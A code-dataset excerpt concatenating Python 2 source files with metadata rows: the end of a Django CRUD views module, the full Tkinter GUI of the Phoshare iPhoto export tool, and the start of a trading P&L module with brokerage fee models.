page_number = 1
if page_number < 1:
page_number = 1
elif page_number > paginator.num_pages:
page_number = paginator.num_pages
page = paginator.page(page_number)
objects = page.object_list
return my_render(request, config.template_dir + 'index.html', {
'form_filters': form_filter,
'objects': objects,
'paginator': paginator,
'page': page,
'page_number': page_number,
'pages_range': range(1, paginator.num_pages + 1),
'next_page': page_number + 1,
'prev_page': page_number - 1
})
def build_query(filters, page):
"""
    Builds the search query from the given filters (the page argument is
    currently unused; pagination is handled by the Paginator in the view).
"""
return filters.buildQuery()
@credential_required('seg_backend')
def create(request, crud_name):
config = cruds[crud_name]
if request.method == 'POST':
form = config.form_class(request.POST)
if form.is_valid():
obj = form.save()
request.set_flash('success', 'Datos guardados correctamente.')
            # redirect to edit
return HttpResponseRedirect(reverse('crudEdit', args=[crud_name, obj.id]))
else:
request.set_flash('warning', 'Ocurrió un error guardando los datos.')
else:
form = config.form_class()
return my_render(request, config.template_dir + 'new.html', {
'form': form,
'is_new': True,
})
@credential_required('seg_backend')
def edit(request, crud_name, obj_id):
config = cruds[crud_name]
obj = config.model_class.objects.get(pk=obj_id)
if request.method == 'POST':
form = config.form_class(request.POST, instance=obj)
if form.is_valid():
obj = form.save()
request.set_flash('success', 'Datos actualizados correctamente.')
else:
request.set_flash('warning', 'Ocurrió un error actualizando los datos.')
else:
form = config.form_class(instance=obj)
return my_render(request, config.template_dir + 'edit.html', {
'form': form,
'obj': obj,
})
@credential_required('seg_backend')
def delete(request, crud_name, obj_id):
config = cruds[crud_name]
obj = config.model_class.objects.get(pk=obj_id)
try:
obj.delete()
request.set_flash('success', 'Registro eliminado correctamente.')
except Exception as e:
print e
request.set_flash('warning', 'No se puede eliminar el elemento porque está en uso.')
return HttpResponseRedirect(reverse('crudList', args=[crud_name]))
| bsd-3-clause | 6,436,716,297,905,079,000 | 41.365385 | 175 | 0.761991 | false | 3.055479 | true | false | false |
nagyistoce/phoshare | phoshare/phoshare_ui.py | 6 | 41112 | """Reads iPhoto library info, and exports photos and movies. GUI version."""
# Copyright 2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import cStringIO
import logging
import os
import platform
import threading
import tkFileDialog
import tkMessageBox
import traceback
# pylint: disable-msg=W0614
from Tkinter import * #IGNORE:W0401
from ttk import *
import appledata.iphotodata as iphotodata
import phoshare.phoshare_main as phoshare_main
import phoshare.phoshare_version as phoshare_version
import tilutil.exiftool as exiftool
import tilutil.systemutils as su
from ScrolledText import ScrolledText
import ConfigParser
import Queue
_CONFIG_PATH = su.expand_home_folder('~/Library/Application Support/Google/'
'Phoshare/phoshare.cfg')
_BOLD_FONT = ('helvetica', 12, 'bold')
_logger = logging.getLogger('google')
def _int_from_bool(boolean_value):
"""Converts a boolean value to an integer of 0 or 1."""
if boolean_value:
return 1
return 0
class HelpDialog(Toplevel):
"""Displays a help dialog, using a scrolled text area."""
def __init__(self, parent, text, title="Phoshare Help"):
Toplevel.__init__(self, parent)
self.transient(parent)
self.title(title)
self.parent = parent
t = ScrolledText(self)
t.insert(END, text)
t.config(state=DISABLED)
t.pack()
class ExportApp(Frame):
"""GUI version of the Phoshare tool."""
def __init__(self, master=None):
"""Initialize the app, setting up the UI."""
Frame.__init__(self, master, padding=10)
top = self.winfo_toplevel()
menu_bar = Menu(top)
top["menu"] = menu_bar
apple = Menu(menu_bar, name='apple')
menu_bar.add_cascade(label='Phoshare', menu=apple)
apple.add_command(label="About Phoshare", command=self.__aboutHandler)
sub_menu = Menu(menu_bar, name='help')
menu_bar.add_cascade(label="Help", menu=sub_menu)
sub_menu.add_command(label="Phoshare Help", command=self.help_buttons)
self.thread_queue = Queue.Queue(maxsize=100)
self.active_library = None
top.columnconfigure(0, weight=1)
top.rowconfigure(0, weight=1)
self.grid(sticky=N+S+E+W)
self.valid_library = False
self.exiftool = False
self.iphoto_library = StringVar()
self.iphoto_library_status = StringVar()
self.browse_library_button = None
self.export_folder = StringVar()
self.library_status = None
self.dryrun_button = None
self.export_button = None
self.text = None
self.events = StringVar()
self.albums = StringVar()
self.smarts = StringVar()
self.foldertemplate = StringVar()
self.nametemplate = StringVar()
self.captiontemplate = StringVar()
self.update_var = IntVar()
self.delete_var = IntVar()
self.originals_var = IntVar()
self.link_var = IntVar()
self.folder_hints_var = IntVar()
self.faces_box = None
self.faces_var = IntVar()
self.face_keywords_box = None
self.face_keywords_var = IntVar()
self.face_albums_var = IntVar()
self.face_albums_text = StringVar()
self.iptc_box = None
self.iptc_all_box = None
self.iptc_var = IntVar()
self.iptc_all_var = IntVar()
self.gps_box = None
self.gps_var = IntVar()
self.verbose_var = IntVar()
self.info_icon = PhotoImage(file="info-b16.gif")
self.create_widgets()
# Set up logging so it gets redirected to the text area in the app.
self.logging_handler = logging.StreamHandler(self)
self.logging_handler.setLevel(logging.WARN)
_logger.addHandler(self.logging_handler)
def __aboutHandler(self):
HelpDialog(self, """%s %s
Copyright 2010 Google Inc.
http://code.google.com/p/phoshare""" % (phoshare_version.PHOSHARE_VERSION,
phoshare_version.PHOSHARE_BUILD),
title="About Phoshare")
def init(self):
"""Initializes processing by launching background thread checker and
initial iPhoto library check."""
self.thread_checker()
if exiftool.check_exif_tool(sys.stdout):
self.exiftool = True
self.faces_box.configure(state=NORMAL)
self.face_keywords_box.configure(state=NORMAL)
self.iptc_box.configure(state=NORMAL)
self.iptc_all_box.configure(state=NORMAL)
self.gps_box.configure(state=NORMAL)
options = self.Options()
options.load()
self.init_from_options(options)
self.check_iphoto_library()
def init_from_options(self, options):
"""Populates the UI from options."""
self.iphoto_library.set(options.iphoto)
self.export_folder.set(options.export)
self.albums.set(su.fsdec(options.albums))
self.events.set(su.fsdec(options.events))
self.smarts.set(su.fsdec(options.smarts))
self.foldertemplate.set(su.unicode_string(options.foldertemplate))
self.nametemplate.set(su.unicode_string(options.nametemplate))
self.captiontemplate.set(su.unicode_string(options.captiontemplate))
self.update_var.set(_int_from_bool(options.update))
self.delete_var.set(_int_from_bool(options.delete))
self.originals_var.set(_int_from_bool(options.originals))
self.link_var.set(_int_from_bool(options.link))
self.folder_hints_var.set(_int_from_bool(options.folderhints))
self.faces_var.set(_int_from_bool(options.faces) and self.exiftool)
self.face_keywords_var.set(_int_from_bool(options.face_keywords) and
self.exiftool)
self.face_albums_var.set(_int_from_bool(options.facealbums))
self.face_albums_text.set(options.facealbum_prefix)
if options.iptc and self.exiftool:
self.iptc_var.set(1)
if options.iptc == 2:
self.iptc_all_var.set(1)
self.gps_var.set(_int_from_bool(options.gps) and self.exiftool)
def _add_section(self, container, text, help_command):
"""Adds a new UI section with a bold label and an info button.
Args:
container: UI element that will contain this new item
row: row number in grid. Uses two rows.
text: label frame text.
help_command: command to run when the info button is pressed.
Returns: tuple of new section and content frames.
"""
section_frame = Frame(container)
section_frame.columnconfigure(0, weight=1)
label = Label(section_frame, text=text)
label.config(font=_BOLD_FONT)
label.grid(row=0, column=0, sticky=W, pady=5)
Button(section_frame, image=self.info_icon,
command=help_command).grid(row=0, column=1, sticky=E)
content_frame = Frame(section_frame)
content_frame.grid(row= 1, column=0, columnspan=2, sticky=N+S+E+W, pady=5)
return (section_frame, content_frame)
def _create_button_bar(self, container, row):
"""Creates the button bar with the Dry Run and Export buttons.
Args:
row: row number in grid.
Returns: next row number in grid.
"""
button_bar = Frame(container)
button_bar.grid(row=row, column=0, sticky=E+W, padx=10)
button_bar.columnconfigure(0, weight=1)
verbose_box = Checkbutton(button_bar, text="Show debug output", var=self.verbose_var)
verbose_box.grid(row=0, column=0, sticky=E)
self.dryrun_button = Button(button_bar, text="Dry Run",
command=self.do_dryrun, state=DISABLED)
self.dryrun_button.grid(row=0, column=1, sticky=E, pady=5)
self.export_button = Button(button_bar, text="Export",
command=self.do_export, state=DISABLED)
self.export_button.grid(row=0, column=2, pady=5)
return row + 1
def _create_library_tab(self, library_tab):
library_tab.columnconfigure(0, weight=1)
row = 0
f = Frame(library_tab)
f.grid(row=row, columnspan=2, stick=E+W, padx=5, pady=5)
row += 1
f.columnconfigure(1, weight=1)
Label(f, text="iPhoto Library:").grid(sticky=E)
iphoto_library_entry = Entry(f, textvariable=self.iphoto_library)
iphoto_library_entry.grid(row=0, column=1, sticky=E+W)
self.browse_library_button = Button(f, text="Browse...",
command=self.browse_library)
self.browse_library_button.grid(row=0, column=2)
self.library_status = Label(f, textvariable=self.iphoto_library_status)
self.library_status.grid(row=1, column=1, sticky=W)
(cf, lf) = self._add_section(library_tab, "Events, Albums and Smart Albums",
self.help_events)
cf.grid(row=row, columnspan=2, stick=E+W)
row += 1
lf.columnconfigure(1, weight=1)
Label(lf, text="Events:").grid(sticky=E)
events_entry = Entry(lf, textvariable=self.events)
events_entry.grid(row=0, column=1, sticky=EW)
Label(lf, text="Albums:").grid(sticky=E)
albums_entry = Entry(lf, textvariable=self.albums)
albums_entry.grid(row=1, column=1, sticky=EW)
Label(lf, text="Smart Albums:").grid(sticky=E)
smarts_entry = Entry(lf, textvariable=self.smarts)
smarts_entry.grid(row=2, column=1, columnspan=3, sticky=EW)
def _create_files_tab(self, files_tab):
files_tab.columnconfigure(0, weight=1)
# Export folder and options
row = 0
(cf, lf) = self._add_section(files_tab, "Export Folder and Options", self.help_export)
cf.grid(row=row, columnspan=2, stick=E+W)
row += 1
lf.columnconfigure(1, weight=1)
label = Label(lf, text="Export Folder:")
label.grid(sticky=E)
export_folder_entry = Entry(lf, textvariable=self.export_folder)
export_folder_entry.grid(row=0, column=1, columnspan=2, sticky=E+W)
Button(lf, text="Browse...",
command=self.browse_export).grid(row=0, column=3)
update_box = Checkbutton(lf, text="Overwrite changed pictures",
var=self.update_var)
update_box.grid(row=1, column=1, sticky=W)
originals_box = Checkbutton(lf, text="Export originals",
var=self.originals_var)
originals_box.grid(row=2, column=1, sticky=W)
hint_box = Checkbutton(lf, text="Use folder hints",
var=self.folder_hints_var)
hint_box.grid(row=3, column=1, sticky=W)
delete_box = Checkbutton(lf, text="Delete obsolete pictures",
var=self.delete_var)
delete_box.grid(row=4, column=1, sticky=W)
link_box = Checkbutton(lf, text="Use file links", var=self.link_var)
link_box.grid(row=5, column=1, sticky=W)
# Templates ----------------------------------------
(cf, lf) = self._add_section(files_tab, "Name Templates", self.help_templates)
cf.grid(row=row, columnspan=2, stick=E+W)
row += 1
lf.columnconfigure(1, weight=1)
Label(lf, text="Folder names:").grid(sticky=E)
foldertemplate_entry = Entry(lf, textvariable=self.foldertemplate)
foldertemplate_entry.grid(row=0, column=1, sticky=EW)
Label(lf, text="File names:").grid(sticky=E)
nametemplate_entry = Entry(lf, textvariable=self.nametemplate)
nametemplate_entry.grid(row=1, column=1, sticky=EW)
Label(lf, text="Captions:").grid(sticky=E)
captiontemplate_entry = Entry(lf, textvariable=self.captiontemplate)
captiontemplate_entry.grid(row=2, column=1, sticky=EW)
def _create_metadata_tab(self, metadata_tab):
metadata_tab.columnconfigure(0, weight=1)
row = 0
# Metadata --------------------------------------------
(cf, lf) = self._add_section(metadata_tab, "Metadata", self.help_metadata)
cf.grid(row=row, columnspan=2, stick=E+W)
row += 1
self.iptc_box = Checkbutton(lf,
text=("Export metadata (descriptions, "
"keywords, ratings, dates)"),
var=self.iptc_var, state=DISABLED,
command=self.change_iptc_box)
self.iptc_box.grid(row=0, column=0, columnspan=2, sticky=W)
self.iptc_all_box = Checkbutton(lf,
text="Check previously exported images",
var=self.iptc_all_var,
command=self.change_metadata_box,
state=DISABLED)
self.iptc_all_box.grid(row=1, column=0, sticky=W)
self.gps_box = Checkbutton(lf,
text="Export GPS data",
var=self.gps_var,
command=self.change_metadata_box,
state=DISABLED)
self.gps_box.grid(row=2, column=0, sticky=W)
# Faces ---------------------------------------------------
(cf, lf) = self._add_section(metadata_tab, "Faces", self.help_faces)
cf.grid(row=row, columnspan=2, stick=E+W)
row += 1
lf.columnconfigure(2, weight=1)
self.faces_box = Checkbutton(lf, text="Copy faces into metadata",
var=self.faces_var, state=DISABLED,
command=self.change_metadata_box)
self.faces_box.grid(row=0, column=0, sticky=W)
self.face_keywords_box = Checkbutton(
lf,
text="Copy face names into keywords",
var=self.face_keywords_var,
command=self.change_metadata_box,
state=DISABLED)
self.face_keywords_box.grid(row=1, column=0, sticky=W)
checkbutton = Checkbutton(lf, text="Export faces into folders",
var=self.face_albums_var)
checkbutton.grid(row=2, column=0, sticky=W)
label = Label(lf, text="Faces folder prefix:")
label.grid(row=2, column=1, sticky=E)
entry = Entry(lf, textvariable=self.face_albums_text)
entry.grid(row=2, column=2, sticky=E+W)
def create_widgets(self):
"""Builds the UI."""
self.columnconfigure(0, weight=1)
n = Notebook(self)
n.grid(row=0, sticky=E+W+N+S)
library_tab = Frame(n)
n.add(library_tab, text='Library')
self._create_library_tab(library_tab)
files_tab = Frame(n)
n.add(files_tab, text='Files')
self._create_files_tab(files_tab)
metadata_tab = Frame(n)
n.add(metadata_tab, text='Metadata')
self._create_metadata_tab(metadata_tab)
self._create_button_bar(self, 1)
self.text = ScrolledText(self, borderwidth=4, relief=RIDGE, padx=4,
pady=4)
self.text.grid(row=2, column=0, sticky=E+W+N+S)
self.rowconfigure(2, weight=1)
def change_iptc_box(self):
"""Clears some options that depend on the metadata export option."""
mode = self.iptc_var.get()
if not mode:
self.faces_var.set(0)
self.face_keywords_var.set(0)
self.iptc_all_var.set(0)
self.gps_var.set(0)
def change_metadata_box(self):
"""Sets connected options if an option that needs meta data is changed.
"""
mode = (self.faces_var.get() or self.face_keywords_var.get() or
self.iptc_all_var.get() or self.gps_var.get())
if mode:
self.iptc_var.set(1)
def help_events(self):
HelpDialog(self, """Events, Albums and Smart Albums
Selects which events, albums, or smart albums to export.
Each field is a regular expression, and at least one must be filled in.
Matches are done against the beginning of the event or album name. An
entry in Events of
Family
will export all events that start with "Family", including "Family 2008"
and "Family 2009". "|" separates alternate patterns, so
Family|Travel
will export all events that start with either "Family" or "Travel".
"." matches any character, and therefore,
.
will export all events. To export all events with "2008" in the name, use
.*2008
For more details on regular expressions, see
http://en.wikipedia.org/wiki/Regular_expression""")
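    # Matching is anchored at the start of the name, e.g. (illustrative):
    #   import re
    #   re.match(u'Family|Travel', u'Family 2008')  # matches
    #   re.match(u'.*2008', u'Travel 2008')         # matches
    #   re.match(u'Family', u'Best Family')         # no match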
def help_templates(self):
HelpDialog(self, """Folder, file, and image caption templates.
Templates are strings with place holders for values. The place holders have
the format "{name}". Everything else in the template will be copied. Examples:
{title}
{yyyy}/{mm}/{dd} {title} - generates "2010/12/31 My Birthday" if the date
of the pictures is Dec 31, 2010, and the title is "My Birthday".
{yyyy} Event: {event} - generates "2010 Event: Birthday" for an event with
any date in 2010 and the name "Birthday".
Available place holders for folder names:
{name} - name of the album or event.
{hint} - folder hint (taken from a line in the event or album description
starting with @).
{yyyy} - year of album or event date.
{mm} - month of album or event date.
{dd} - date of album or event date.
Available place holders for file names:
{album} - name of album (or in the case of an event, the name of the event).
{index} - number of image in album, starting at 1.
{index0} - number of image in album, padded with 0s, so that all numbers have
the same length.
{event} - name of the event. In the case of an album, the name of the event
to which the image belongs.
{event_index} - number of image in the event, starting at 1. In the case of an
album, this number will be based on the event to which the
image belongs.
{event_index0} - same as {event_index}, but padded with leading 0s so that all
values have the same length.
{title} - image title.
{yyyy} - year of image.
{mm} - month of image (01 - 12).
{dd} - day of image (01 - 31).
If you are using {album}/{index}/{index0} place holders, the image will be
named based on whatever album or event it is contained. That means an image
in two albums will be exported with different names, even so the files are
identical. If you want to use the same name for each image, regardless of
which album it is in, use {event}, {event_index}, and {event_index0} instead.
Available place holders for captions:
{title} - image title.
{description} - image description.
{title_description} - concatenated image title and description, separated by a
: if both are set.
{yyyy} - year of image.
{mm} - month of image (01 - 12).
{dd} - day of image (01 - 31).
""")
def help_buttons(self):
HelpDialog(self, """Export modes.
Click on "Dry Run" to see what Phoshare would do without actually modifying any
files.
Click on "Export" to export your files using the current settings.
All your settings will be saved when you click either Dry Run or Export, and
re-loaded if you restart Phoshare.
Check "Show debug output" to generate additional output messages that can assist
in debugging Phoshare problems.
""")
def help_export(self):
HelpDialog(self, """Export Settings
Export Folder: path to the folder for exporting images.
Overwrite changed pictures: If set, pictures that already exist in the export
                            folder will be overwritten if a different version
                            exists in iPhoto. Any edits made to previously
exported images in the export folder will be lost!
Use Dry Run to see which files would be overwritten.
Export originals: If set, and an image has been modified in iPhoto, both the
original and the edited version will be exported. The original
will be stored in a sub-folder called "Originals".
Use folder hints: By default, each exported event or album will become a folder
in the export folder. With folder hints, a sub-folder name can
be given in the event or album description by adding a line
starting with a @ character. Example:
Family Vacation
@Vacation
would export all images in that event into a sub-folder called
"Vacation".
Delete obsolete pictures: If set, any image, movie file or folder in the export
folder that does not exist in the iPhoto library will
be deleted. Use Dry Run to see which files would be
deleted.
Use file links: Don't copy images during export, but make a link to the files
in the iPhoto library instead. This option is only available
if the export folder is on the same drive as the iPhoto library.
This option will save a lot of disk space because it avoids
making copies of all your images and videos. Using this option
causes the metadata of the images IN YOUR IPHOTO LIBRARY to be
modified. While phoshare should not cause any problems to your
images, it is best to use this option only if you have a backup
of your iPhoto library, and you know how to restore your library
from the backup. For more details on link mode, see
https://sites.google.com/site/phosharedoc/Home#TOC-link-mode""")
def help_faces(self):
HelpDialog(self, """Faces options.
Copy faces into metadata: face tags and face regions will be copied into the
image metadata using the Microsoft Photo Region
Schema:
http://msdn.microsoft.com/en-us/library/ee719905(VS.85).aspx
Copy face names into keywords: If set, face names will be merged into image
keywords. Requires "Export metadata" checked.
Export faces into folders: If checked, folders will be created for each face
tag, each containing all the images tagged with
that person.
Faces folder prefix: If set, the string will be used as a prefix for the
face export folders if "Exported faces into folders"
is checked. This can be just a value like "Face: ", or
a sub-folder name like "Faces/" if it ends with a "/"
Metadata options will be disabled if exiftool is not available.
""")
def help_metadata(self):
HelpDialog(self, """Metadata options.
Export metadata: sets the description, keywords, rating and date metadata in the
exported images to match the iPhoto settings.
Check previously exported images: If not checked, metadata will only be set for new or
updated images. If checked, metadata will be checked in
all images, including ones that were previously
exported. This is much slower.
Export GPS data: export the GPS coordinates into the image metadata.
Metadata options will be disabled if exiftool is not available.""")
def check_iphoto_library(self):
self.valid_library = False
self.enable_buttons()
self.iphoto_library_status.set("Checking library location...")
self.launch_export("library")
def set_library_status(self, good, message):
if good:
self.valid_library = True
self.enable_buttons()
self.iphoto_library_status.set(message)
def write_progress(self, text):
self.text.insert(END, text)
self.text.see(END)
def enable_buttons(self):
if self.valid_library:
self.dryrun_button.config(state=NORMAL)
self.export_button.config(state=NORMAL)
else:
self.dryrun_button.config(state=DISABLED)
self.export_button.config(state=DISABLED)
self.browse_library_button.config(state=NORMAL)
def browse_library(self):
path = tkFileDialog.askopenfilename(title="Locate iPhoto Library")
self.iphoto_library.set(path)
self.check_iphoto_library()
def browse_export(self):
path = tkFileDialog.askdirectory(title="Locate Export Folder")
self.export_folder.set(path)
def do_export(self):
if self.active_library:
self.stop_thread()
return
if not self.can_export():
return
self.export_button.config(text="Stop Export")
self.dryrun_button.config(state=DISABLED)
self.run_export(False)
def do_dryrun(self):
if self.active_library:
self.stop_thread()
return
if not self.can_export():
return
self.dryrun_button.config(text="Stop Dry Run")
self.export_button.config(state=DISABLED)
self.run_export(True)
def stop_thread(self):
if self.active_library:
self.active_library.abort()
def export_done(self):
self.active_library = None
self.dryrun_button.config(text="Dry Run")
self.export_button.config(text="Export")
self.enable_buttons()
class Options(object):
"""Simple helper to create an object compatible with the OptionParser
output in Phoshare.py."""
def __init__(self):
self.iphoto = '~/Pictures/iPhoto Library'
self.export = '~/Pictures/Album'
self.albums = ''
self.events = '.'
self.smarts = ''
self.ignore = []
self.delete = False
self.update = False
self.link = False
self.dryrun = False
self.folderhints = False
self.captiontemplate = u'{description}'
self.foldertemplate = u'{name}'
self.nametemplate = u'{title}'
self.aperture = False # TODO
self.size = '' # TODO
self.picasa = False # TODO
self.movies = True # TODO
self.originals = False
self.iptc = 0
self.gps = False
self.faces = False
self.facealbums = False
self.facealbum_prefix = ''
self.face_keywords = False
self.verbose = False
def load(self):
"""Attempts to load saved options. Returns True if saved options
were available."""
if not os.path.exists(_CONFIG_PATH):
return False
config = ConfigParser.SafeConfigParser()
config.read(_CONFIG_PATH)
s = 'Export1'
if config.has_option(s, 'iphoto'):
self.iphoto = config.get(s, 'iphoto')
if config.has_option(s, 'export'):
self.export = config.get(s, 'export')
if config.has_option(s, 'albums'):
self.albums = config.get(s, 'albums')
if config.has_option(s, 'events'):
self.events = config.get(s, 'events')
if config.has_option(s, 'smarts'):
self.smarts = config.get(s, 'smarts')
if config.has_option(s, 'foldertemplate'):
self.foldertemplate = config.get(s, 'foldertemplate')
if config.has_option(s, 'nametemplate'):
self.nametemplate = config.get(s, 'nametemplate')
if config.has_option(s, 'captiontemplate'):
self.captiontemplate = config.get(s, 'captiontemplate')
if config.has_option(s, 'delete'):
self.delete = config.getboolean(s, 'delete')
if config.has_option(s, 'update'):
self.update = config.getboolean(s, 'update')
if config.has_option(s, 'link'):
self.link = config.getboolean(s, 'link')
if config.has_option(s, 'folderhints'):
self.folderhints = config.getboolean(s, 'folderhints')
if config.has_option(s, 'captiontemplate'):
                self.captiontemplate = unicode(config.get(s, 'captiontemplate'))
if config.has_option(s, 'nametemplate'):
self.nametemplate = unicode(config.get(s, 'nametemplate'))
if config.has_option(s, 'size'):
self.size = config.get(s, 'size')
if config.has_option(s, 'picasa'):
self.picasa = config.getboolean(s, 'picasa')
if config.has_option(s, 'movies'):
self.movies = config.getboolean(s, 'movies')
if config.has_option(s, 'originals'):
self.originals = config.getboolean(s, 'originals')
if config.has_option(s, 'iptc'):
self.iptc = config.getint(s, 'iptc')
if config.has_option(s, 'gps'):
self.gps = config.getboolean(s, 'gps')
if config.has_option(s, 'faces'):
self.faces = config.getboolean(s, 'faces')
if config.has_option(s, 'facealbums'):
self.facealbums = config.getboolean(s, 'facealbums')
if config.has_option(s, 'facealbum_prefix'):
self.facealbum_prefix = config.get(s, 'facealbum_prefix')
if config.has_option(s, 'face_keywords'):
self.face_keywords = config.getboolean(s, 'face_keywords')
return True
def save(self):
"""Saves the current options into a file."""
config = ConfigParser.RawConfigParser()
s = 'Export1'
config.add_section(s)
config.set(s, 'iphoto', self.iphoto)
config.set(s, 'export', self.export)
config.set(s, 'albums', su.fsenc(self.albums))
config.set(s, 'events', su.fsenc(self.events))
config.set(s, 'smarts', su.fsenc(self.smarts))
config.set(s, 'foldertemplate', su.fsenc(self.foldertemplate))
config.set(s, 'nametemplate', su.fsenc(self.nametemplate))
config.set(s, 'captiontemplate', su.fsenc(self.captiontemplate))
config.set(s, 'delete', self.delete)
config.set(s, 'update', self.update)
config.set(s, 'link', self.link)
config.set(s, 'dryrun', self.dryrun)
config.set(s, 'folderhints', self.folderhints)
config.set(s, 'size', self.size)
config.set(s, 'picasa', self.picasa)
config.set(s, 'movies', self.movies)
config.set(s, 'originals', self.originals)
config.set(s, 'iptc', self.iptc)
config.set(s, 'gps', self.gps)
config.set(s, 'faces', self.faces)
config.set(s, 'facealbums', self.facealbums)
config.set(s, 'facealbum_prefix', self.facealbum_prefix)
config.set(s, 'face_keywords', self.face_keywords)
config_folder = os.path.split(_CONFIG_PATH)[0]
if not os.path.exists(config_folder):
os.makedirs(config_folder)
configfile = open(_CONFIG_PATH, 'wb')
config.write(configfile)
configfile.close()
def can_export(self):
if (not self.albums.get() and not self.events.get() and
not self.smarts.get()):
tkMessageBox.showerror(
"Export Error",
("Need to specify at least one event, album, or smart album "
"for exporting."))
return False
return True
def run_export(self, dry_run):
mode = "export"
if dry_run:
mode = "dry_run"
self.launch_export(mode)
def launch_export(self, mode):
"""Launch an export operation in a new thread, to not block the UI.
Args:
mode - name of operation to run, "library", "dry_run", or "export".
"""
self.text.delete('1.0', END)
self.browse_library_button.config(state=DISABLED)
export_thread = threading.Thread(target=self.export_thread,
args=(mode,))
export_thread.start()
def export_thread(self, mode):
"""Run an export operation in a thread, to not block the UI.
Args:
mode - name of operation to run, "library", "dry_run", or "export".
"""
try:
# First, load the iPhoto library.
library_path = su.expand_home_folder(self.iphoto_library.get())
album_xml_file = iphotodata.get_album_xmlfile(library_path)
data = iphotodata.get_iphoto_data(album_xml_file)
msg = "Version %s library with %d images" % (
data.applicationVersion, len(data.images))
self.write(msg + '\n')
if mode == "library":
# If we just need to check the library, we are done here.
self.thread_queue.put(("done", (True, mode, msg)))
return
# Do the actual export.
export_folder = su.expand_home_folder(self.export_folder.get())
args = ['Phoshare.py', '--export', '"' + export_folder + '"']
options = self.Options()
options.iphoto = self.iphoto_library.get()
args.extend(['--iphoto', '"' + options.iphoto + '"'])
options.export = self.export_folder.get()
options.dryrun = mode == "dry_run"
options.albums = self.albums.get()
if options.albums:
args.extend(['--albums', '"' + options.albums + '"'])
options.events = self.events.get()
if options.events:
args.extend(['--events', '"' + options.events + '"'])
options.smarts = self.smarts.get()
if options.smarts:
args.extend(['--smarts', '"' + options.smarts + '"'])
options.foldertemplate = unicode(self.foldertemplate.get())
if options.foldertemplate:
args.extend(['--foldertemplate', '"' +
options.foldertemplate + '"'])
options.nametemplate = unicode(self.nametemplate.get())
if options.nametemplate:
args.extend(['--nametemplate', '"' +
options.nametemplate + '"'])
options.captiontemplate = unicode(self.captiontemplate.get())
if options.captiontemplate:
args.extend(['--captiontemplate', '"' +
options.captiontemplate + '"'])
options.ignore = [] # TODO
options.update = self.update_var.get() == 1
if options.update:
args.append('--update')
options.delete = self.delete_var.get() == 1
if options.delete:
args.append('--delete')
options.originals = self.originals_var.get() == 1
if options.originals:
args.append('--originals')
options.link = self.link_var.get() == 1
if options.link:
args.append('--link')
options.folderhints = self.folder_hints_var.get() == 1
if options.folderhints:
args.append('--folderhints')
options.faces = self.faces_var.get() == 1
if options.faces:
args.append('--faces')
options.face_keywords = self.face_keywords_var.get() == 1
if options.face_keywords:
args.append('--face_keywords')
if self.iptc_all_var.get() == 1:
options.iptc = 2
args.append('--iptcall')
elif self.iptc_var.get() == 1:
options.iptc = 1
args.append('--iptc')
else:
options.iptc = 0
options.gps = self.gps_var.get()
if options.gps:
args.append('--gps')
options.facealbums = self.face_albums_var.get() == 1
if options.facealbums:
args.append('--facealbums')
options.facealbum_prefix = self.face_albums_text.get()
if options.facealbum_prefix:
                args.extend(['--facealbum_prefix',
                             '"' + options.facealbum_prefix + '"'])
exclude = None # TODO
options.save()
print " ".join(args)
self.logging_handler.setLevel(logging.DEBUG if self.verbose_var.get() else logging.INFO)
self.active_library = phoshare_main.ExportLibrary(export_folder)
phoshare_main.export_iphoto(self.active_library, data, exclude,
options)
self.thread_queue.put(("done", (True, mode, '')))
except Exception, e: # IGNORE:W0703
self.thread_queue.put(("done",
(False, mode,
str(e) + '\n\n' + traceback.format_exc())))
def thread_checker(self, delay_ms=100): # 10x per second
"""Processes any queued up messages in the thread queue. Once the queue
is empty, schedules another check after a short delay.
This method runs in the main thread, and therefore, can update the UI.
"""
writes = 0
while True:
try:
(callback, args) = self.thread_queue.get(block=False)
if callback == "write":
self.write_progress(args)
writes += 1
if writes >= 10:
# After 10 consecutive writes to the progress area,
# update the UI so that the user can see the progress.
self.update()
writes = 0
continue
# Must be a "done" message, with a (success, mode, msg)
# argument.
success = args[0]
mode = args[1]
msg = args[2]
if success:
self.write_progress("Done!")
else:
self.write_progress("Error: " + msg)
if mode == "library":
self.set_library_status(success, msg)
else:
self.export_done()
except Queue.Empty:
break
# Check the queue again after a short delay.
self.after(delay_ms, self.thread_checker)
def write(self, text):
"""Writes text to the progress area of the UI. Uses the thread queue,
and can be called from a non-UI thread."""
self.thread_queue.put(("write", text))
def writelines(self, lines): # lines already have '\n'
"""Writes text to the progress area of the UI. Uses the thread queue,
and can be called from a non-UI thread."""
for line in lines:
self.write(line)
def main():
"""Main routine for phoshare_ui. Typically launched from Phoshare.py"""
app = ExportApp()
app.master.title(phoshare_version.PHOSHARE_VERSION)
sys.stdout = app
try:
app.init()
app.mainloop()
except Exception, e:
f = cStringIO.StringIO()
traceback.print_exc(file=f)
app.write_progress('--- Fatal Error ---\n')
app.write_progress('Please include the information below in your bug'
' report.\n\n')
app.write_progress('%s\n\n%s\n' % (str(e), f.getvalue()))
app.write_progress('\n'.join(os.uname()))
app.write_progress('\nMac version: %s\n' % (platform.mac_ver()[0]))
app.write_progress('Python version: %s\n' % (platform.python_version()))
tkMessageBox.showerror(
'Phoshare Error',
'Phoshare encountered a serious problem and will shut down. '
'Please copy the information shown in the application output panel '
'when reporting this problem at\n'
'http://code.google.com/p/phoshare/issues/entry\n\n%s.' % (str(e)))
raise e
if __name__ == "__main__":
main()
| apache-2.0 | -2,774,218,249,301,504,500 | 40.653495 | 100 | 0.581509 | false | 3.946247 | true | false | false |
chris-ch/omarket | python-lab/src/pnl.py | 1 | 2606 | import logging
import math
import numpy
class ZeroFeeModel(object):
def compute_fees(self, quantity, price):
return 0.
class InteractiveBrokersStockUSFeeModel(object):
def compute_fees(self, quantity, price):
        # $0.005/share, $1 minimum per order, capped at 0.5% of trade value;
        # use abs() so sell fills (negative quantity) are charged like buys.
        shares = abs(quantity)
        max_fees = shares * price * 0.5 / 100
        return max(min(max_fees, 0.005 * shares), 1.)
class AverageCostProfitAndLoss(object):
"""
    Computes P&L based on the weighted average cost method.
"""
def __init__(self, quantity=0, cost=0., realized_pnl=0):
self._quantity = quantity
self._cost = cost
self._realized_pnl = realized_pnl
